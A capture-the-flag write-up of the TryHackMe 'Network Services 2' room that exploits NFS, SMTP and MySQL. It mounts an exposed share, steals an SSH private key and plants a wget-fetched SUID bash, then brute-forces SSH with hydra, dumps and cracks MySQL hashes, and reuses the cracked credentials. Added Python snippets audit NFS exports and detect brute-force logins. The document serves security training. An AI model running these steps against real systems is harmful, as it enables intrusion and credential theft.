This is a write-up of the TryHackMe room Network Services 2 found at https://tryhackme.com/room/networkservices2
Task 1 Get Connected
This task just made sure I was able to get connected to the TryHackMe VPN.
No answer needed
Task 2 Understanding NFS
NFS is a network file system that creates a storage location on the network and makes it available to users of the network. It does this by mounting a directory from a host and then using the RPC (Remote Procedure Call) protocol to connect to it. The user id and group id are used to decide which permissions apply to a file or directory; this determines whether a user can or cannot read/write/execute the file. NFS can be used across non-similar operating systems such as Windows, Linux, or MacOS.
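Because NFS trusts the user id and group id the client presents, the one mapping the server enforces itself matters a great deal. As an added illustration (my own code, not part of the original write-up), the Python below parses /etc/exports entries and flags the settings that make the client-side uid trust dangerous: no_root_squash, which is what the root-owned SUID technique later in Task 4 depends on, and writable exports open to every host. The sample exports file is constructed.

```python
import re

# Constructed /etc/exports sample (not the room's real configuration).
SAMPLE_EXPORTS = """\
# shared home directories
/home        *(rw,sync,no_root_squash,no_subtree_check)
/srv/backup  10.0.0.0/24(ro,sync,root_squash)
/srv/public  192.0.2.10(rw,sync) 192.0.2.11(rw,sync,no_root_squash)
"""

ENTRY_RE = re.compile(r"^(\S+)\s+(.*)$")

def parse_exports(text):
    """Yield (path, client, options) for each client spec in exports(5) syntax."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        m = ENTRY_RE.match(line)
        path, rest = m.group(1), m.group(2)
        for spec in rest.split():
            client, _, opts = spec.partition("(")
            options = opts.rstrip(")").split(",") if opts else []
            yield path, client, options

def audit_exports(text):
    """Return (path, client, reason) findings.

    root_squash is the default and maps a client's uid 0 to the anonymous
    user, so a root-owned SUID file cannot be planted through the share.
    no_root_squash removes that mapping, which is what lets a client's
    chown root / chmod +s take effect on the server.
    """
    findings = []
    for path, client, options in parse_exports(text):
        opts = set(options)
        if "no_root_squash" in opts:
            findings.append((path, client, "no_root_squash: client root is server root"))
        if client == "*" and "rw" in opts:
            findings.append((path, client, "writable export open to any host"))
    return findings

if __name__ == "__main__":
    for path, client, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {client}: {reason}")
```

On the client side the matching mitigation is mounting with the nosuid option, which makes the kernel ignore the SUID bit on that filesystem.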
What does NFS stand for?
Network File System
What process allows an NFS client to interact with a remote directory as though it was a physical device?
Mounting
What does NFS use to represent files and directories on the server?
file handle
What protocol does NFS use to communicate between the server and client?
RPC
What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2
user id / group id
Can a Windows NFS server share files with a Linux client? (Y/N)
Y
Can a Linux NFS server share files with a MacOS client? (Y/N)
Y
What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.
4.2
Task 3 Enumerating NFS
Conduct a thorough port scan of your choosing, how many ports are open?

I ran a simple nmap scan and found 7 ports open.
7
Which port contains the service we’re looking to enumerate?
The NFS service is running on port 2049.
2049
Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

I found the share /home from the output.
/home
I used the command below to mount the target’s share to my temp folder.
sudo mount -t nfs $ip:/home /tmp/mount/ -nolock
After the share was mounted I looked inside the /tmp/mount/ folder and found a folder called cappucino.

cappucino
Have a look inside this directory, look at the files. Looks like we’re inside a user’s home directory…

No answer needed
Interesting! Let’s do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?
The .ssh folder is the most interesting one because it is likely to have keys I could use to log in.
.ssh
Which of these keys is most useful to us?

Inside the .ssh directory was a public and private RSA key. The id_rsa is more valuable because it is the private key. Since I was already there I decided to dump the usernames from the public key before moving on.

This confirmed that the username cappucino was accurate, as hinted by the name of the home folder. This also told me the machine name was polonfs.
Next, I copied the id_rsa file to my machine at ~/.ssh/, set its permissions using the command chmod 600, then used that key to connect via ssh to the server using the username cappucino.

Can we log into the machine using ssh -i <key-file> <username>@<ip>? (Y/N)
Y
Task 4 Exploiting NFS
First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.
No answer needed
First I downloaded the bash file mentioned in the task from github using the command wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash

After the bash file downloaded, I used sudo chown root bash as instructed by the task to change the file ownership to root. After that I moved into the mounted home directory, then used cp ~/Downloads/bash . to make a copy of the bash file I downloaded into the mounted share. This moved the file into the NFS server.
No answer needed
Now, we’re going to add the SUID bit permission to the bash executable we just copied to the share using sudo chmod +[permission] bash. What letter do we use to set the SUID bit using chmod?
A quick google search told me that the SUID bit letter is s.

s
Let’s do a sanity check, let’s check the permissions of the “bash” executable using ls -la bash. What does the permission set look like? Make sure that it ends with -sr-x.
I found that running sudo chmod +s bash didn’t create the exact permissions required. It created permissions -rwSr-Sr--. I was able to get the correct permissions set by then using sudo chmod +x bash. This then gave me -rwsr-sr-x, which was the correct answer to the question.

-rwsr-sr-x
Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Let’s run it with ./bash -p. The -p persists the permissions, so that it can run as root with SUID, as otherwise bash will sometimes drop the permissions.
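As an added example (my own code, not from the room or the write-up), this Python parser turns the symbolic permission field printed by ls -la into numeric mode bits and accounts for the -rwSr-Sr-- result seen above: an uppercase S means the SUID/SGID bit is set but the execute bit is not, so chmod +s on a file that was never executable shows S until +x is added. The second function scans constructed ls -la output for root-owned SUID files, which is the check a defender would run over an NFS share.

```python
import stat

# Symbolic permission field as printed by ls -la, e.g. "-rwsr-sr-x".
# Lowercase s/t in an execute slot: special bit AND execute bit are set.
# Uppercase S/T: special bit set but execute bit missing (as in -rwSr-Sr--).
PERM_BITS = (
    stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
    stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
    stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH,
)
SPECIAL_BITS = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}

def parse_mode(field):
    """Convert a 10-character ls permission field into numeric mode bits."""
    if len(field) != 10:
        raise ValueError(f"bad permission field: {field!r}")
    mode = 0
    for i, ch in enumerate(field[1:]):      # field[0] is the file type
        if ch == "-":
            continue
        if ch in "rwx":
            mode |= PERM_BITS[i]
        elif ch in "sStT" and i in SPECIAL_BITS:
            mode |= SPECIAL_BITS[i]
            if ch in "st":                   # lowercase also carries execute
                mode |= PERM_BITS[i]
        else:
            raise ValueError(f"unexpected {ch!r} in {field!r}")
    return mode

def suid_root_entries(ls_output):
    """Return (name, mode) for root-owned regular files that have SUID set."""
    hits = []
    for line in ls_output.splitlines():
        parts = line.split(None, 8)          # perms links owner group size date(3) name
        if len(parts) < 9 or not parts[0].startswith("-"):
            continue                         # skips the 'total' line, dirs, links
        mode = parse_mode(parts[0])
        if parts[2] == "root" and mode & stat.S_ISUID:
            hits.append((parts[8], mode))
    return hits

# Constructed listing modelled on the mounted share in the write-up.
SAMPLE_LS = """\
total 1200
drwxr-xr-x 5 cappucino cappucino    4096 Jan  1 12:00 .
-rw-r--r-- 1 cappucino cappucino     220 Jan  1 12:00 .bash_logout
-rwsr-sr-x 1 root      root      1113504 Jan  1 12:00 bash
"""
```

suid_root_entries(SAMPLE_LS) returns [('bash', 0o6755)]; on a live system the same function can be fed the output of ls -la run over the mounted share.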
Great! If all’s gone well you should have a shell as root! What’s the root flag?
THM{nfs_got_pwned}
Task 5 Understanding SMTP
SMTP is the protocol responsible for sending out emails. It stands for Simple Mail Transfer Protocol. An SMTP server is what routes emails to the correct mailbox. SMTP operates on port 25 by default and can run on both Windows and Linux machines.
The SMTP process begins with the SMTP handshake, which validates the sender and receiver of the message before the email is sent. If the server is unable to deliver the message to the recipient’s server, it puts the message into the SMTP queue.
Ultimately the message reaches the recipient’s email server, which will be a POP3 or IMAP server.
What does SMTP stand for?
Simple Mail Transfer Protocol
What does SMTP handle the sending of? (answer in plural)
emails
What is the first step in the SMTP process?
SMTP handshake
What is the default SMTP port?
25
Where does the SMTP server send the email if the recipient’s server is not available?
SMTP queue
On what server does the Email ultimately end up on?
POP/IMAP
Can a Linux machine run an SMTP server? (Y/N)
Y
Can a Windows machine run an SMTP server? (Y/N)
Y
Task 6 Enumerating SMTP
First, let’s run a port scan against the target machine, same as last time. What port is SMTP running on?
I ran a simple nmap scan and found two ports open, 22 and 25 for ssh and smtp respectively.

25
Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?
msfconsole
Let’s search for the module “smtp_version”, what’s its full module name?

In metasploit I found the module auxiliary/scanner/smtp/smtp_version.
auxiliary/scanner/smtp/smtp_version
Great, now- select the module and list the options. How do we do this?

I used the command use 0 to select the option number next to the module. Then to display the options that may need to be set before using the module I used the command options.
options
Have a look through the options, does everything seem correct? What is the option we need to set?
The above image shows that I needed to set the RHOSTS option in the module. The RHOSTS option in Metasploit is essentially the target ip address.
RHOSTS
Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?

Running the exploit told me the server was running the system mail name polosmtp.home.
polosmtp.home
What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.
I ran a google search to learn more about Mail Transfer Agents. I learned that they are basically an application or server that is sent mail by SMTP before the MTA uses POP3/IMAP to send to the recipient server.

There are 7 different types of MTAs according to my google search. It told me that one of the types was called Postfix. I remembered seeing this in the information given by the previous exploit.
Postfix
Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module “smtp_enum”, what’s its full module name?

This time searching for smtp_enum I found the module auxiliary/scanner/smtp/smtp_enum.
auxiliary/scanner/smtp/smtp_enum
What option do we need to set to the wordlist’s path?
First I needed to get a wordlist for usernames. I downloaded Seclists using sudo apt install seclists. Once done I used the username list found at /usr/share/seclists/Usernames/top-usernames-shortlist.txt.

Back in the metasploit console I used the command use 0 to select the smtp_enum module. In the module’s options I discovered I needed to set RHOSTS and USER_FILE if I want to use something other than the default. To select the SecList I just downloaded I ran set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt.
USER_FILE
Once we’ve set this option, what is the other essential parameter we need to set?
RHOSTS
Now, run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

No answer needed
Okay! Now that’s finished, what username is returned?

I ran the exploit and found the username administrator on the system.
administrator
Task 7 Exploiting SMTP
The username was acquired, so now all that was left was to crack the password. I used hydra and gave it the rockyou.txt password file as input. The full command used was hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt $ip ssh.

Hydra told me the password for administrator is alejandro.
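From the defender's side, a 16-thread hydra run like the one above leaves a very recognisable trail in sshd's auth.log. The Python below is an added example (not from the write-up) that counts failed password attempts per source address and user and flags any source that then succeeds, which is the signal that the guessed credential needs rotating rather than just blocking the address. The log lines, the hostname and the 10.10.14.2 address are constructed.

```python
import re
from collections import defaultdict

# Matches the two sshd messages that matter here (Ubuntu auth.log style).
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def detect_ssh_bruteforce(lines, threshold=10):
    """Return (src_ip, user, failures, success) for sources over threshold.

    success is True when the same source later got 'Accepted password'
    for that user, i.e. the guessing likely worked and the credential
    needs rotating, not just the address blocking.
    """
    failures = defaultdict(int)
    accepted = set()
    for line in lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        key = (m["src"], m["user"])
        if m["result"] == "Failed":
            failures[key] += 1
        else:
            accepted.add(key)
    return [(src, user, n, (src, user) in accepted)
            for (src, user), n in sorted(failures.items()) if n >= threshold]

# Constructed auth.log excerpt: a burst of guesses against "administrator"
# followed by a successful login from the same (made-up) address.
SAMPLE_LOG = [
    f"Jan  1 12:00:{i:02d} polosmtp sshd[{900 + i}]: Failed password for "
    f"administrator from 10.10.14.2 port {40000 + i} ssh2"
    for i in range(16)
] + [
    "Jan  1 12:00:17 polosmtp sshd[917]: Accepted password for administrator "
    "from 10.10.14.2 port 40017 ssh2",
    "Jan  1 12:05:00 polosmtp sshd[950]: Failed password for invalid user "
    "guest from 192.0.2.7 port 5555 ssh2",
]

if __name__ == "__main__":
    for src, user, n, ok in detect_ssh_bruteforce(SAMPLE_LOG):
        print(f"{src} -> {user}: {n} failures, later success={ok}")
```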
What is the password of the user we found during our enumeration stage?
alejandro
Great! Now, let’s SSH into the server as the user, what are the contents of smtp.txt?
With the password in hand I was able to login to the ssh server on the target.

In the initial directory after connecting I found the smtp.txt file I was looking for.

I displayed the contents of the file using cat and found the challenge flag.
THM{who_knew_email_servers_were_c00l?}
Task 8 Understanding MySQL
MySQL is a relational database management system that is based on the SQL language. It uses the client-server model: a centralized server holds the data and client systems connect to it. One common use of MySQL servers is handling the back-end database needs of apps and websites.
What type of software is MySQL?
relational database management system
What language is MySQL based on?
SQL
What communication model does MySQL use?
client-server
What is a common application of MySQL?
back-end database
What major social network uses MySQL as their back-end database? This will require further research.
I ran a google search and discovered Facebook uses MySQL. However I also found other major sites use MySQL such as LinkedIn and Pinterest. However Facebook is the answer that solves the question.
Facebook
Task 9 Enumerating MySQL
This task assumes I had already found credentials for the mysql server: the username root and the password password. I then needed to scan the IP address to find which port holds the mysql service.

What port is MySQL using?
I ran a simple nmap scan using -Pn, which avoids DNS checking to speed up the test a little bit, and included the entire port range using -p-.

I found mysql running on port 3306.
3306
With knowledge of the port number, I used the command mysql -h $ip -u root -P 3306 -p to connect to the server. I tried to include the password after the -p, as in -p password added at the end of the command, but it did not work correctly. Only using the exact command above seemed to work.

No answer needed
At this point I knew the login credentials actually work and we can access the mysql server with them. Next I opened metasploit and searched for the mysql_sql module. It can be found at auxiliary/admin/mysql/mysql_sql.

No answer needed
Search for, select and list the options it needs. What three options do we need to set? (in descending order).

I found there were three options I needed to set: password, rhosts, and username.
PASSWORD/RHOSTS/USERNAME
I set those options to the target’s information and ran the exploit.

The exploit told me the server is running version 5.7.29-0ubuntu0.18.04.1.
By default it will test with the “select version()” command, what result does this give you?
5.7.29-0ubuntu0.18.04.1
Change the “sql” option to “show databases”. How many databases are returned?

4
Task 10 Exploiting MySQL
The task recommends using the mysql_schemadump module and first asks for its full location. I ran search mysql_schemadump and found it.

auxiliary/scanner/mysql/mysql_schemadump
What’s the name of the last table that gets dumped?

First I ran options to find what settings needed to be adjusted. This one was the same as before: just password, rhosts, and username. I set those to the appropriate values based on what I already knew about the server, then ran the exploit.

The last table mentioned in the output was named x$waits_global_by_latency.
x$waits_global_by_latency
Search for and select the mysql_hashdump module. What’s the module’s full name?

I searched for the mysql_hashdump module and found it at auxiliary/scanner/mysql/mysql_hashdump.
auxiliary/scanner/mysql/mysql_hashdump
What non-default user stands out to you?

Just like before, I took a look at the options for the mysql_hashdump module and set the required configuration. Once everything was in place I hit run.

The exploit gave usernames and hashed passwords in the output. The most interesting username is carl because it is obviously not a default system user. The full text with hash is carl:*EA031893AA21444B170FC2162A56978B8CEECE18.
carl
To simplify things I created a new text file called hash.txt and put the user/password hash text into the file using the command echo "carl:*EA031893AA21444B170FC2162A56978B8CEECE18" > hash.txt.

What is the user/hash combination string?
carl:*EA031893AA21444B170FC2162A56978B8CEECE18
Now, we need to crack the password! Let’s try John the Ripper against it using: “john hash.txt” what is the password of the user we found?
I used the tool John the Ripper in its default configuration and gave it the hash.txt file I just created. John found the password doggie for the carl username by just using john hash.txt.

doggie
Since I now know Carl uses this password for mysql it is worth checking the ssh server in case the same password is used there.

I was able to ssh into the server using Carl’s same credentials. This is an example of reusing credentials across different systems causing poor security. If Carl had used a different password for ssh I would not have gotten this access.
What’s the contents of MySQL.txt?

In Carl’s default directory I found a text file named MySQL.txt with the contents THM{congratulations_you_got_the_mySQL_flag}.
THM{congratulations_you_got_the_mySQL_flag}